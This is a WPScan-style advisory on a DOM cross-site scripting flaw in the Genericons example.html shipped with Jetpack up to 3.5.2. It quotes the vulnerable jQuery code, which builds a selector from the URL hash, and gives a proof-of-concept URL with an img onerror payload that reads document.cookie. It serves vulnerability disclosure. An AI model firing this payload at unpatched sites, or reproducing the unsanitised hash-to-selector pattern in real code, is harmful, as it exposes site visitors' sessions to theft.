Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Genericons <= 3.2 vulnerable to DOM XSS in the example.html file due to using outdated version of jQuery and vulnerable code.

Vulnerable Code:

permalink = "genericon-" + window.location.hash.split('#')[1];
cssclass = jQuery( '.' + permalink ).attr('class');
Proof of Concept
http://www.example.com/wp-content/plugins/jetpack/_inc/genericons/genericons/example.html#<img src=x onerror=alert(document.cookie)>

Affects

Plugin jetpack
fixed in version 3.5.3

References

URL https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 737
Verified No
WPVDB ID 7964

Timeline

Publicly Published 2015-05-06 (over 1 year ago)
Added 2015-05-06 (over 1 year ago)
Last Updated 2015-09-09 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.